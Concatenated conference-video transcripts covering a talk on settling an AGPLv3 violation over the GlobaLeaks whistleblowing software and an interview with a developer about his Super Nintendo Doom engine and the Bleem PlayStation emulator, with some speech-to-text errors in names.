no chance to show because we have a settlement but we were able to trace the history of the repository and the dates when the repository was added because software heritage had made a snapshot of that repository and we were able to retrieve it from a third party, a reliable third party. Now this is also a problem that we would have faced in case we hadn't been able to just prove the timeline. Of course the log and the git repository have a date but there is no date stamp. So it's difficult to prove that a certain modification occurred at a certain time. Of course you can trace the history but the history can be altered. There are many articles out there and suggestions as to how to prove how a project evolved. Of course if the project is public you have many witnesses and people copying the same and cloning the same repository over and over but actually having one single true source of authority as to the timeline that is also a good idea especially in case you decide to switch to another license as in practice globally. So it was a long story perhaps the case was lucky enough to be brought to a happy end as I said through a settlement what ends good is good. Eventually we had a very good relationship with the authority after we showed that we were not there for money or for prestige and they stuck to the agreement to the letter. It was a costly exercise in terms of time. My personal time Alberto joined Batista and other people like Marco Ciusina I want to mention him. He was not in the case but he was helpful trying to establish connection and to relay the right messages to the right people and also costly on a monetary side. My time was partly for Bono, Giovanni Batista and Alberto and Tardy for Bono and there was a cost connector to the application but at the end of the day it's possible to go after even big guys for a small project like a state actually for a branch of the state so to speak and win and bring home a good result. So I want to thank you for your attention. I want to thank the post-demo organizer and the dev room organizer for having us. It was the first time we could speak publicly about this topic and thank you to my co-host Alberto Fabio and Giovanni Batista. We remain available for any further queries, questions, curiosity. We are sticking here for some minutes longer. Please don't hesitate. Meanwhile, see you next time. Bye. So one of you has the audio still going. Please mute it. All right, thank you so much for doing that summary and that presentation. I think that was really useful to the audience. We had some great questions coming in. Somebody on this panel needs to mute their audio from the broadcast room. But okay, so the first question, are you all the legal team that worked on this? Was that all of you? Oh, that's a good question. Actually I made some obscure comments or question on the chat. Actually we completely forgot to mention that there was a lady, a lawyer, a very fine lawyer, helping us with the, unfortunately, the leg work without the spotlight on that she was very helpful and she has done the actual filings and stuff. So I forgot to mention her. I wanted to give her credit. She was on the records as a lawyer and she is also an AC lawyer. And so I wanted to mention her too. So Marko Chultina was on the records but he is with a fellow at Herman's Centre and he has also been, given suggestions, it was considered, it was suggesting to be, to be asked to be quiet, patient, then everything will be good at the end. So we have a bunch of good questions that the audience came in with. The first one, I'm just going to go by how they are upvoted since they're that way the audience has a chance to weigh in on what's asked. So the top question is from Bikun. It was, do the speakers think that the AGPLV3 Section 5A required disclosure of the commit history, for example, the Git repository? This is not the first time this question has been asked in this context. I don't think so. I think that could be helpful and it's a way to show this. But consider if the same source code or circulated as a tarble and there is no way to, using this as the way to make the comments and make the notice would mean that everybody would have to also do the same. That would be quite cumbersome. I think the notices should go in the source code now, aside or complementing the distribution of the source code because that could be easily steeped out even involuntarily. Conversely, if you made notices in the source code, you make sure that everybody would just have to download the source code and then we distribute it and to upload it, not necessarily on the same order 4 or a clone of the same repository. Yes, if I may add something on this also, the thing is that legally required to state your copyright, but not always the authors of the commits are the copyright holders. If they work for a cooperation, the copyright is owned by the company. So it's not exactly the same information. Does anybody else want to add anything? Okay, so the next question is, if you could all change the definition of source code in AGPLv3, what would you do? Or do you think the current definition is perfect? I cannot see any major flaws. I think defining it by its purpose, it's the best thing. Because as long as you go down in redefining better defining it, I think you will wish to leave something obvious outside and not coping up with evolution. Of course, that was made with C-like languages and not interpretive languages. But I think it's still quite a good one, at least if you are conversing with technology with software development. The problem we have here is that there was some bad faith on somebody and some misunderstanding on other people not knowing that, being able to read somehow the code wasn't the requirement. But if they had looked at the requirement of the AGPL, that would have been much more simple and straightforward, I think. I just wanted to add a little comment to say that the case and what Alberto stated is a testimony that this definition is a very short one. It's very good also because it clearly says what source code is and especially says what that the non-source code is the object of. So this kind of definition doesn't leave any room for any different interpretation which may confuse when it comes to languages as JavaScript. That's not related to this, but somebody has already pointed out that I still forgot to mention this lady, a lawyer helping us. Her name is Elisabeth D'Affamio. So it's not the same, Fabio is the family name, not like Fabio Petrosantius. She's Elisabeth Fabio. She used to work with me and she will still cooperate. Does anybody want to add anything about the definition in AGPL? All right, so is there some place that we can read all about this? Are you going to do a blog post where you talk about the whole story in details? I think the Herb Center has some of the story, at least until we start to string in little documents. We consider to discuss it in a better detail what happened. Of course, we cannot exchange, we cannot reveal the actual communication. Neither are we allowed to share the actual documents. In case it ended with a public decision that would have been public, but the other documents are not public, it cannot be disclosed. With that having time and finally the good key, it will be a good idea for us to say something about it and having this presentation is the best, the closest thing we could think of without writing something. I think that it would be a very interesting exercise to publish a joint handout of the case with anti-corruption authority. In order to foster compliance and in order to avoid similar mistakes in the future, it would be very, very interesting also in the spirit of collaboration with public authorities. I don't know if Fabio wants to add something on it. Yeah, so as all the friends that in this talk that we did the journey with within this AGBL litigation, my personal, activist soul were always kicking to push publicly and transparency and transparently any kind of document that we were exchanging with the authority counterparts because a non-software expert answer can make you smile a lot. But I understand that for a greater good, it was best to find an arrangement and in such a case, I would like to say that our activist spirit, that's also about embarrassing public agency when it's worthwhile, was put to a narrow level for the true greater good achievement. The first one was that we are aligned with the social purpose of anti-corruption authority in the fight of corruption. So we are allies, we are not enemies. And that was a mistake because of a lack of knowledge related to software copyright and the specific aspects of open source software licenses. And the second, it's also about the fact that in Italy, we have a very decent law on news and that the public code, public money concept, it's by law applied in Italy, but is not yet being applied every day by public agencies. And so creating a lot of noise about an error, a mistake by a central public agency in doing something good, that's about publishing the modification of a free software, would that be counterproductive in our common action in making public agencies push their software with free license. So I wanted to underline that because we realized that the case has been big and there was also a big opportunity to make a lot of noise, but we decided to work under the line to achieve such a greater good. So my, I'm curious about whether the rules are the same as in Germany. I see Braille is asking the same question. But from our experience, sort of, I know a little bit about Germany because of the VMware case. So I was wondering, is it the laws that require the filings to be private? Is that like, is that a, you know, mandated that any of the filings be non-published until there's a final decision? And then once it's there's a final decision, can you publish all the documents? No, no, actually, you can, you're not supposed to be publishing also the documents. Sometimes that would be interesting to, in general terms, I mean, especially the finance meetings where you sum up all the case and make all the most thorough explanation of your case and stuff. But that's not, it's not really in the law. There is a general understanding and by bar rules and data protection also, that is something that you're not supposed to do. Only the decision, which in turn will bring much of the information required and the interesting stuff, but the judge is somewhat in a position to be reporting correctly the position of the parties. But apart of that, there is no transparency at all for everything that has gone through the case. Actually, I'm working for a legal publisher and they will be keen on also publishing the finance meetings because sometimes they are very well written by very high level lawyers, even Supreme Court, and they are not available to anybody at all levels, including Supreme Court. That's a pity. Yes, sir. And also, sorry, and also in this case, there was only a request for a preliminary injunction, so there was no final decision which would have been published. The final decision would be, maybe it would have been published, not for the preliminary injunction, but for the final judgment if it ever would have ended without a settlement. So in this case, everything was quite private and would be like that. So the next question is from someone with the handle of Donix. And the question is, how do you afford to take this pro bono and how long did it take? It's not been so expensive, I mean, in terms of time. It was quite expensive and it required a lot of hours put into it, but eventually it's something we all do as a part of our contribution back to society for making a decently good return on our profession. It took, in the time span between we started and until we reached a settlement was more than 18 months. Was like 10 months before actually deciding to go to court, 20 to 12 months. And then unfortunately COVID was, we were supposed to have a hearing on March 2020, but that goes adjourned by three months because everything was shut down. And that was really all court also to discuss because we couldn't go to court. We had to do remotely and the judge wasn't available to have any live discussion. We were supposed to having a very short discussion. Only we could, that's quite interesting because we have not been allowed to find a full rebuttal to reply of the other party. So we were just supposed to say, state your case on what you want and that's it. And that was the cool, we had to say, okay, we propose to end this by a second because we were close, of course. And there was no chance to reply in every detail. In terms of hours, frankly, I didn't take any kind of it because I would be perhaps in the 80, 100, I don't know. So the next question is, do courts generally, this is for Max Mel, do courts generally accept software heritage as a source for evidence? Oh, generally, I cannot state it because it never happened to me to be forced to that. But sometimes I have filed like other sources. So it's not legally valid. I mean, it's not binding, but the judge can take any source of evidence as an evidence. So the rule is the pre-unfettered decision of the judge. So that's that there is no formal rule for what is evidence, what is not. I mean, there are rules, but on witness evidence, there are rules on what is legal evidence, but in general, everything can be evidence. If it comes from a third party, like a newspaper, like a log, or somebody who does that and it's not related to you, it's even more valid, effective, and convincing. That's the key to be convincing and not related to one of the parties. So we're there. This is another question we had in the channel. Were there any discussions of installation issues in the discussion with the violator? No. What can be the angle here? Maybe Carlo, it's about referring to the installation scripts or the packaging scripts. Because if you remember, we had also some support files that were not present. That's possibly one of the item related to installation. But it's worth saying that the open whistle blowing, the name of the fork with this AGPL violation was packaged for use with Red Hat system, with RPM packaging, and while GlobalX is made up for that packaging, with underdebian and Ubuntu and so on. And what we found out is that the packaging scripts was missing. Maybe that will be one option related to the installation. It's worth saying that five days after the anti-corruption authority released the AGPL infringing version of their software and made a public announcement so that organizations such as Bank of Italy started applying it, so I mean spreading the violation itself, we released a 15-page technical document saying which were the technical use and the technical consideration among the true edition of the software. Without any comments on quality, but based on technical factual analysis. In order to let the technical community make their own evaluation, because we had a monoclonal comment, and it's currently the same situation, but now everything has been cleared that there were those two software. The one recommended by the anti-corruption authority and the one based on the GlobalX one made by the Hermes Center that was three years ahead in development. So a public agency, which of the two software had to choose? And that was a problem, let me say, of a narrative of installation. And what we did is to produce technical documentation to let people evaluate and judge on a technical basis. So here's another question from an audience member named Borger. And the question is, the license states that the original source code must be supplied when asked, but are there any rules, and I would say with an Italian focus, to how it should be provided. Public repository on GitHub may seem obvious, but could it also be provided printed on paper, for example? Okay. In our case, there was no question on how, because everything was provided actually in everything which was provided was provided on the GitHub repository. They were part missing, but there was no question of unwillingness to supply the source code. They felt short of their obligation and they provided something different, but no question about it. In paper, that would be quite impractical, and that would not, in my understanding, meet the requirement of the preferred form, because a file that you can modify, not something that you have to scan or otherwise. If it's a hello word, perhaps, but anything more than that, I would not say that is the preferred way to modify. And by modifying, modifying with other people, exchanging with other people, I think it's an interesting question, but the answer is definitely no. Well, if we may just add that in this case, we are speaking about AGPL, so it means that anyone interacting through a network with a software application must be able to obtain a copy of the source code and the license. So that means being made publicly reachable by who can interact over the network with the software that implicitly say put it digitally somewhere online. So I've got another question I'm going to ask before I do that. I want to thank the panelists for joining us, and I'm going to ask the question and we're going to move over to the private room and anyone who wants to join, it's becoming public, and so anyone can join and continue this conversation. So thank you so much. Thank you.
|
Globaleaks is an AGPLv3+ SaaS application for anonymous whistleblowing, developed by the Hermes Center. After receiving a prototype, the Italian Anticorruption authority (ANAC) re-published a version under EUPL, modifying attribution & copyright statement, removing reasonable notice from GUI, and failing to fully comply with source code obligations. The controversy was brought to Court and eventually settled, restoring the correct license, and patching the other issues. Several lessons learned. Fabio Pietrosanti - Naif (Project leader) - Fabio Pietrosanti has been part of the hacking digital underground with the nickname “naif” since 1995, while he’s been a professional working in digital security since 1998. President and co-founder of the Hermes Center for Transparency and Digital Human Rights, he is active in many projects to create and spread the use of digital tools in support of freedom of expression and transparency. Member of Transparency International Italy, owner of Tor’s anonymity nodes, Tor2web anonymous publishing nodes, he is among the founders of the anonymous whistleblowing GlobaLeaks project, nowadays used by investigative journalists, citizen activists and the public administration for anti-corruption purposes. He is an expert in technological innovation in the field of whistleblowing, transparency, communication encryption and digital anonymity. As a veteran of the hacking and free software environment, he has participated to many community projects such as Sikurezza, s0ftpj, Winston Smith Project, Metro Olografix, among others. Professionally, he has worked as network security manager, senior security advisor, entrepreneur and CTO of a startup in mobile voice encryption technologies. Copyright, Criminal, Data Protection/Privacy and IT law are his main areas of expertise. In the last years, he is devoting a significant part of his practice to the legal aspects of UAVs (drones) After a cum laude degree in Law in Italy, he moves to Great Britain for the Master of Laws in Maritime Law e Information Technology Law at the University College London - UCL. Afterwhile, he earns a PhD. In 2009 he obtains the European Certificate on Cybercrime and Electronic Evidence (ECCE). He is ISO 27001:2013 Certified Lead Auditor (Information Security Management System). Member of the Bar of Cagliari since 1996, admitted to the Supreme Court since 2009, Data Protection Officer, he is a fellow of the Department "Informatica Giuridica" at the Università Statale of Milan where he teaches in the Post-Graduate Course in Digital Forensics and cybercrime. He also teaches at the Master for Data Protection Officers, organized by the Politecnico of Milan. Fellow of the Nexa Center on Internet and Society and of the Hermes Center for Transparency and Digital Human Rights. Author of several publications on the above mentioned areas and speaker at the main national and international congresses, he sides his legal profession an intense teaching activity, mainly in the field of copyright, Free/Open Source Software, data protection, IT security, digital forensics and drones.
|
10.5446/53640 (DOI)
|
Computer, it says recording, so I'm guessing it's recording. So for the people watching, so welcome to this very, very interesting thing, interview I guess for Fosdam, but I have this one with Abdul Radi, I'm the second most interesting person in this interview, and with me here is, how to describe him, well let's just say a legend, and it's my honor and privilege and extreme, extreme pleasure because I'm a huge fan to introduce Mr. Rand Lindum. Thank you very much, that's quite an introduction, I'm very, very flattered. Yeah, I've been rehearsing it for like a week, but excellent. No, it's good, it's very flattering, I've been very, very fortunate and very, very lucky. I got my start when I was very young, I had my very first program published when I was 13 on the Commodore 64, it was the Centipede clone, because back then arcade games were the in thing, and I made a Centipede clone on the Commodore 64, and it was all done in 6502 assembly language, because back then there wasn't really a C compiler, the language hadn't really come into its own yet, and so everything that you wrote on the Commodore 64 was either written in basic, or it was written in 6502, and so I've been a programmer now for as of two weeks ago, 38 years. Congratulations, I would say. Thank you, I've worked on Commodore 64, Commodore 128, I've worked on the Amiga, I've worked on PCs, I've worked on Macintosh, I worked on Nokia Symbian phones, I've worked on Android, I've worked on iOS, I've worked on Amazon Fire devices, I've worked on embedded systems, and I've written a wide range of software, I've written some video games a while ago, one of the most famous things that I've written, which is what we'll talk about today, is called Gleam, but I also wrote the very first full screen color, streamed live from disk animated game on a home computer called Dragonslayer, and I did an Amiga version of that, and it was originally on a laser disk, and the whole program fits into 8K of 68,000 codes, so the entire program for Dragonslayer is this tiny, tiny, tiny little program. This is just the code without the assets, of course. That's correct, just the code without the assets. Back then, the assets, all the original source material, the digitized material fit onto a massively huge 40 megabyte hard drive. That was the data, back then, I think it was a Conner drive, was enormous, and these days, the laptop that I'm talking to you on right now has 8 terabytes of storage, and compared to the 40 megabyte hard drive, it's minuscule, but coming from the Commodore 64 and the Commodore 128, one of the things that I learned very early on was how to keep things nice and compact and optimized, and I think that that really helped sort of direct the projects that I've worked on, and in particular, it was very helpful with BLEEM to make it possible to do some of the stuff that it did. The Centipede clone, was that like in a magazine back then? That was the way to go? No, actually it wasn't. It was actually sold, and it was sold on, if we weren't in the time of COVID, I would be talking to you from Seattle, and I would actually be able to hold up and show you the floppy disk, the 5.25 inch floppy disk, and cassette tape that Bubbles was sold on because the Commodore 64 had a 1541 disk drive, and it had a cassette tape drive as well. So it was actually a real commercial where you could go into a store back then. The only stores left these days are like EB games, but back then on every corner there was a store that had usually Commodore 64s or Amigas, and you could go into one of these stores and actually buy it. And yeah, like I said, that was a long time ago, almost 35, 45 years, long time ago. Good times, good times. So yeah, I don't know. Like I said before the video, I'm still a bit nervous, but I'll get over it a little. No, don't be nervous. But this is amazing. So yeah, so like I mentioned, one of our emails, I'm a big fan of Doom, and you worked, yeah, everybody, not everybody, but most people do, of course, it's amazing, and you worked on the amazing Doom port for the Super Nintendo. Yes. Yes. So I had started the project. I was actually working at a company called Sculptured Software at the time, and I was working on a monster truck rally game, which ended up never seeing the light of day. But it had these huge monster trucks and erased monster trucks. And at the time, the Super FX had just been announced by Nintendo. And we went to a Nintendo developer conference where it was all top secret, and they showed us at the time, Star Fox running. And everybody was so amazed that here was the Super Nintendo doing 3D. It got a standing ovation. And Sculptured had decided to do a game called Dirt Tracks FX, which is a dirt track racing game for the Super FX. And while that was in development, I ended up developing a whole development chain, an assembler, a linker, a source level debugger for the Super FX that was based on a hacked up Star Fox cartridge. We hired an electrical engineer to basically take apart the Star Fox cartridge and replace the ROM with a tiny little boot ROM that was an EEPROM and RAM. And so I then wrote a bootloader that communicated to the development system, which was based on the Amiga, that allowed you to download code to the RAM. And the whole reason all of this was done, all these complicated steps, was because there was no development system available. And the only way to get access to the Super FX chip was through the Star Fox cartridge. Because you could just go to a store and buy one. And so that's pretty much what we did. We went to the store and bought one. And the electrical engineer made this huge breadboard thing with wires and stuff coming all over the place. And all it basically did was replace the ROM with RAM. So you could download to it. And as it turns out, I have recently released, I guess maybe six months now or so, on my GitHub page. Actually, you can go to Randall Linden, R-A-M-D-A-L-L-I-M-D-E-N, all one word, dot com. And it redirects to a link tree page. And one of the links is for GitHub. And on GitHub, you can now download the entire source code for the Super Nintendo version of Doom. And you can also download the Amiga-based tool chain, which runs, if you're familiar with emulators, WinUae for Amiga. And you can actually build Doom for the Super Nintendo. I don't have the assets included because of copyrights and ownership issues. But all of the code is there. And people can take a look at it. Yeah, OK. One thing that really interested me about this particular, we should move to the other thing, the emulator thing a bit. But I can't resist, right? But one thing that really interests me was because Doom was written in C and you rewrote the whole thing in assembly. Right? Yes, yes. I had never seen the code for Doom. But I knew that the Super Effects, based on the technology and the speed and the Super Nintendo, I knew that it would be capable of making Doom. And so I wrote my own engine that did a very similar thing as Doom on the PC does, as far as the way that it internally operates. But it's all written in Super Effects GSU 2A code. And the rest of it is a tiny little bit of 65816 on the Super Nintendo that basically handles joystick input, DMA transfers, starting and stopping the Super Effects. But the game itself is, it's all written in assembly language. And it's all written in the Super Effects assembly language. It's a risk processor. It's very, very cool. It's one of my favorite architectures ever. And I've written on 6502, 68000, DSPs, 65816, 386. I've written for FPUs and GPUs and a whole bunch of other things. And the Super Effects chip design is one of the most elegant, efficient processors that I've ever seen. It's really quite a marvel. And so yes, if you go to GitHub, GitHub analyzes the code and it shows that it's 98% assembly language. And the reason that it's not 100% is because I've also included all the tools. So all the processing tools and all of those were written in C. Okay, okay, okay. Yeah, that was very interesting. So yeah, I have so many questions, but we shouldn't really talk about this, but it's so interesting. So the last thing I'm going to ask about, you know, let's talk about this afterwards. So I've got lots of time. I've allocated the whole afternoon for you. Thank you. Thank you very much. My pleasure. Let's see. Should we move on? Okay, so last question about this. So basically you actually wrote the game from scratch. It wasn't actually a port like many people think. Oh, okay. It was a totally original engine. Totally original technology. I reverse engineered dooms assets. So I saw how all of the artwork fit together. I wrote my own tool chain so that you basically could take doom assets run through the tool chain and it converted it into my format for my engine, which I call the reality engine. But yeah, it's not a port. It's a completely unique original engine that was custom made for the Super Nintendo and the Super effects. And as it turns out, since the source code release, there's there's a couple of message boards that have talked about it. And somebody came up with a brilliant idea that I wish I had thought of back when doom was was released. And that is to use the Super effects mosaic. Basically what it does is it takes pixels and it duplicates the pixels for a mosaic style effect. The doom engine that I wrote can render single pixels. But I ended up doing double pixels because it cost half as many cycles to horizontally double the pixels. And if I had thought about it a little more at the time, I would have used the Super Nintendo mosaic to do the pixel doubling in hardware. And I would have been able to write half as many pixels to RAM and almost doubled the frame rate. Okay. That's interesting. Yeah, it's well, it's it's it's if anything it's proof that no matter how good you think something is, there's always something there's always a different way and unique perspective. There's always, I like to say, always better code out there. I'm pretty pleased with the result because I think it was a technical achievement. But I also recognize that there's lots of room for improvement. And as I said, it wasn't until I released the source code and people were digging through it, and somebody had come up with this really unique idea of, oh, you can use the mosaic on the Super Nintendo hardware and it's like, oh, yeah, I wish I had thought of that. But you know, in retrospect, everything is easier. So exactly, exactly. It took 20 something years to come up with a better way of doing it. So in the big picture, it's not so bad. It's possible. It's possible. But that's amazing. That's amazing. Right. Thank you. Yeah. So this is one of the one of the things I shouldn't really talk about myself a lot. But you know, so one of the things is when I was worrying about this interview, you know, and, you know, we prepare some questions and and and I sent them over and and I was thinking, you know, so every one of these questions, we could talk like two hours about, which is interesting. But, you know, it's, I don't know if, yeah, if, you know, if we can, we can, you know, put that video up in the conference. They won't accept it. But we can start our own conference. So it'll be long that while there's a lot of as it turns out, one of the unique things about about Gleam and the PlayStation. This was back in the day when there was a lot of parts, a lot of pieces to the system. These days you've got your your GPU and you can just send down millions of polygons and textures and all that stuff is just sort of done for you. But back in the days of the Nintendo and the Super Nintendo and then the PlayStation, you really had to orchestrate and organize all of the parts, all of your graphics and your sound and your CD tracks and and your code and it had to be optimized and there's a lot of parts to talk about as far as the actual emulator goes. But then there's the whole topic of emulation in general and and how far things have come. If if anything, I think these days emulators are both easier to write and harder to write because the hardware that's being emulated is so state of the art. But they're easier in some respects, I think, because you can do a lot more high level emulation. The low level emulation is where you're sort of you're emulating the processor and you're emulating certain chips and a higher higher level emulation is is where you you know something about what you're emulating. You know something about the target device that's being emulated like it's sending down a polygon and that's sort of how BLEEM operated BLEEM knew that that when a PlayStation game did a certain sequence of operations, what it was really doing was sending down polygon coordinates to the GTE and so instead of necessarily emulating all of the really low level chip, you know chip based components, large chunks of BLEEM were emulating the intent of the PlayStation rather than the actual underlying operation of the PlayStation and that's why BLEEM could do things like especially shown off in BLEEMcast on the Dreamcast where it could really enhance the game because BLEEM wasn't trying to be a PlayStation. It was trying to do what the PlayStation did but targeted for the platform on which it was running. So on PCs that meant if you've got a 3D graphics card which back then 3D graphics cards were rare this was back in the days when you had I want to say rendition, verite, there was Voodoo, 3DFX, the diamonds, the creative cards, all the good stuff. Back then you had six or eight manufacturers that were all trying to compete in the 3D space as it was developing. Direct 3D from Microsoft was Direct 3D 1.0 and back then it was very rare for a graphics card that had 3D capabilities to do translucency. They were predominantly aimed at throwing lots of polygons at things but they didn't really do translucency and a lot of games on the PlayStation used translucency to get nice glass effects and smooth shaded effects and things like that. And so it depended on the graphics card what your results were when you were running under Blean. Different graphics cards stored internally the textures in different formats sometimes so what I would send to a graphics card would end up taking a lot more space than the PlayStation itself. And so that's why the graphics cards back then if it had 8 megabytes of memory it was enormous and these days graphics cards have gigabytes, gigs upon gigs of memory and hundreds or thousands of processors. But back then the PlayStation was a technical marvel for how they very carefully fit all the pieces together. And so that was one of I think the challenges in Blean to sort of to emulate the game but to enhance it and to take care of all of the components. Yeah but it's a very nice point right so because you mentioned the PlayStation was really a technical marvel but at the time we okay so I at least didn't understand the PlayStation as well but I did understand Blean was a technical marvel and as I you know as I gained more experience and I gained more insight into the PlayStation Blean became even more amazing right because to be able to do that right because Blean I think it ran on Pentium 150's or 160's or something like that right so and nowadays you can't even imagine something like that the PlayStation was I don't remember something like 50 megahertz I think I don't remember. 25. Yeah okay so. 25 and somewhere 33 and yes it was Sony did a brilliant job but it really was an homage to Sony and the genius of the PlayStation it was always intended as to expand the audience for PlayStation games because there was a handful of 3D games on the PC you had well or two and a half D games you had you know Doom and you had Hexen and Heretic and then you had Quake and there was Descent there was Unreal and so you had a handful of 3D games. Flight simulator never forget flight simulator. Flight simulator exactly there was there was a bunch of these but you could hold them you know in your hands whereas on the PlayStation there were hundreds of games that were all 3D that had music that had video this was back when the average CD ROM drive was either a 1X or a 2X CD ROM and to have music and video playing in a game was on the PC it was just unheard of you might have a cutscene or something like that that was umpteen megabytes of compressed video data but the PlayStation could do all that in hardware it had a custom chip called the M-Deck for motion I believe it's motion decompression engine it's it's basically um it's basically sort of like motion jpeg um and it could decode little tiny pixel blocks and when you streamed off of a CD to decode these little pixel blocks you could make full screen video um on a on a CD ROM drive that was running at you know 2X speed whereas on the PC it required multiple thousands of dollars worth of PC hardware to be able to do something like that and and here you could get a PlayStation for I want to say $1.99 or something like that so it was it was quite impressive um the way that they chose all of the components a lot of them weren't were so many components Sony being a semiconductor company had all of these chips like they had a CD ROM chip and they had a sound chip they were the ones who made the sound chip for the super nintendo it was a sony sound chip that was in the super nintendo and so they had experience especially working with nintendo I'm sure that you know the original PlayStation was a super nintendo add-on and then Sony decided to go it on their own and the rest is history as they say um but at the time BLEEM really uh was a project that was intended to bring the games all of those hundreds and hundreds of games to the millions and millions of PC users who like I said after you had your quakes and and your dooms and your flight simulator and and so on you you could play per app of the rapper or you could play ridge racer there just weren't a lot of those kinds of games on the PC and BLEEM sort of opened the door to that absolutely absolutely but it also begs the question right so so it was something very the the idea itself right it was very unique right it's like you you know people make games for computers which is you know we've been used to it for like at that point like late 90s like maybe like 10 20 years I guess right where the where the market really picked up and and and all of a sudden you have this idea I'm gonna make a commercial you know video game emulator for the PlayStation for the PC right it's like I don't know I just how did that come about right so how did it come about I was working on PC software at the time and had seen the PlayStation owned a PlayStation and Ridge racer one of my favorite games that's a very very old school game Ridge racer and and I thought to myself well if a PC is capable of running quake and it's capable of running doom certainly it's capable of running Ridge racer not that Ridge racer is by any stretch a simple game because it actually does some fairly complicated things internally which I didn't know until I was developing BLEEM itself but it just seems like sort of the planet sort of aligned and it said yes this is a good idea that that especially because when I first put the Ridge racer disk into the PC it recognized it I was stunned because there was there was a program there was graphics files there was data and it just seemed like a perfect fit to make it possible to play this game on at the time a low-end PC because most people didn't have high-end PCs but the hardware I knew would be capable of doing it it would just take an awful lot of work to get it done. Right then so this is a very good you know like they call it like a segue right so because when you put the city in the PC right so because I did the exact same thing the only thing is I stopped after that this I was amazed that the PC could read it right I had these I must do. Right like this Sony how can they mix it whatever right there. Well you want to think how can they make such a mistake but it wasn't really a mistake because it was actually brilliant Sony made it possible. It was a regular CD in the PlayStation so that it was a very efficient inexpensive component the Sony CD drives were everywhere and they I'm sure were thinking we've got the PlayStation console and the magic is in the console which it is it's got all of these custom chips that do the sound and the motion decoding and it's got the GTE for doing graphics transformations and rendering and it's got its own VRAM and it's a really sort of a dedicated arcade machine in a box whereas at the time PCs really didn't do that they they you had games on PCs and you had games for many years on PCs but the PC wasn't really targeting gamers the way it sort of turned out in the long run now now if you're a gamer you're either a hardcore console gamer or you're a PC gamer and there's the whole battle there between the two but this was just at the start where you wouldn't see the diversity of games on the PC until years later but there was on Nintendo, Super Nintendo, PlayStation, Sega Genesis, all of these older consoles that the hardware inside them was very simple compared to the PC the technology in PCs was very advanced but it wasn't really designed for graphics it wasn't really most people probably these days don't even think about oh yeah I'm gonna get this particular GPU and especially a sound card back then there was a dozen or so different sound card manufacturers did you have a creative sound blaster did you have the Disney sound plus did you all of them? Oh yeah, Hercules or whatever. Oh no exactly and the graphics ultrasound was another one these days when you buy a PC it sort of comes with all that stuff and unless you're a gamer or you're a hardcore graphics guy you don't really think about gee I want to put this particular graphics card into my machine unless you're building a custom machine but back then PCs you really have to think about it you know do I want a diamond graphics card or a voodoo graphics card or something else from 3DFX and what kind of sound card do I want and do I want a 2x CD-ROM or a 4x CD-ROM and these days CD-ROMs are even fading away because everything is all digital and it's all being streamed. Yeah, that's what I mean. So I remember if I remember correctly at least from a different interview you mentioned the next step after you know you put the CD in you went and to a bookstore and you got a MIPS manual. I did, I went to an actual, it was an actual bookstore because they still had them back then although I think Barnes and Noble is still around these days and they still sell books but it was about this thick and it was an actual MIPS R3000 manual. Okay. And I started looking through the op codes and reading the manual and sure enough when you take a look at the files that are on the disk it's actual code. There was no encryption, there was no obfuscation, nothing? No obfuscation, no encryption, no decryption, no nothing. It was here's an executable and if you looked at the executable and you looked at the op codes you could even see text often. I don't remember specifically which ones but there are a number of games that shipped with debug symbols and bugging information and yes all sorts of stuff like that which for somebody who's trying to reverse engineer a system it's like wow that's a gold mine all that information that's there but yes this was before the days where everything is encrypted and everything is hashed and everything is secure and reverse engineering starts with trying to figure out how on earth you're going to make it read a disk or what public key was used to encrypt and sign the digital manifest of something else and back then it was you know stick the disk into the PCCV wrong drive and wow there's the whole program the magic happens between reading the contents of the disk and making it actually play the game. There's a lot of steps in between the two but yeah I went to the bookstore got the MIPS manual and thankfully as it turns out didn't have to implement everything I implemented BLEEM I sort of described it on an as needed basis literally I would run a program I wrote the initial part of the emulator that it was a an interpretive emulator that basically means that I take each op code and I interpret the op code and when I came across an op code that I hadn't written support for yet I would implement it so I didn't actually write a complete processor there were op codes that didn't get implemented until months into development because no games that I was using for testing and for development and for debugging happened to use those particular op codes and so when the game was running it would just all of a sudden stop and it would in the debugger I used a debugger a very low level debugger called softice yeah it's a very very old school because the whole program was was written in x86 assembly again assembly again yeah for speed yeah and so when I came across an unimplemented op code it would just stop and then I would go ahead and I would write the code to implement the op code and then they would get a little further and get a little further get a little further and the very first time the program didn't stop I knew it was running it didn't crash because I could stop the program and see yes it's still executing code but there wasn't really a visual display that's one of the interesting things about the the PlayStation and a lot of systems that are similar to it you sort of send down a list of polygons to render and you just assume that they're going to get rendered there's there's no interaction back and forth between the the the CPU side of things and the GPU side of things at least back then there there really wasn't so like for example Ridge racers got this really beautiful waving flag beautiful you know 20 plus 30 years ago time frame and they just send down polygons and render things and they assume that the flag is being rendered and displayed yeah very udb like exactly so I was able to get a lot of code operational without having to have a lot of components fully operational and running it allowed me to develop especially the graphics side of things as I figured things out because I there was my first experience with with 3d with 3d math with you know why you would want to take two or three points and triangulate and calculate and you know certain numerical values or why it was important to know that here's the set of points and here's an average of the points because you're trying to do collision or you're trying to do z sorting for example where it's required by the program to render things in the right order and so the the PlayStation didn't have a Z buffer and a Z buffer for people that don't know allows you to specify depth it effectively is for each pixel that you draw how far away from the eye that particular pixel or texture or polygon is supposed to be and so what the PlayStation did is it assumed you would known as painters algorithm or you sorted your polygons so that's why things would sort of very so often flicker they would they would flicker because they got closer or further to the camera than another polygon that was right next to it and in one frame this one would be closer and the other frame this one would be closer and so you would see this little bit of flickering there well part of part of this lack of symbiosis lack of knowledge that yes the graphics are rendering you know with pixel precision is what allowed Bling to enhance the graphics in the first place I know when a game is sending down a polygon and the game doesn't really care most games didn't really care how the polygon actually made it to the screen and so that allowed me to separate out the CPU component from the graphics component and the motion decoding component and the sound component and all of these different things because although they were interrelated they weren't sort of lockstep where there was a lot of dependency some that's one of the flaws of doing emulation the way that game does it certain games won't run under Bling because of for example they know when they're rendering the triangles and the polygons and it's going into to video RAM they're then using the results of that video RAM rendering to do special effects like fogging and blurring and certain things like that and because Bling didn't really emulate VRAM the the same way the PlayStation graphics engine wrote and processed video graphics there are just some things that Bling would never be able to do. I wouldn't say never right. There are there are ways around it there are solutions to it but they're they're complicated and there's a lot of overhead involved and on balance the net result of being able to say here's the game and it was running at 320 by 240 but now it runs at 640 by 480 with you know full screen anti-aliasing and multi-sampled and isotropic filtering and it does all these neat things and oh yes it's running on the Sega Dreamcast instead of on the PlayStation one there's a lot to be said for for the magic of being able to take a disk from one platform and and run it on another platform and have the enhancements to it. It really yeah okay yeah I've always you know and I mentioned this I think in the questions as well but I've always wanted to ask about this is so so right why did you choose to do Blingcast instead of like Bling to you know the 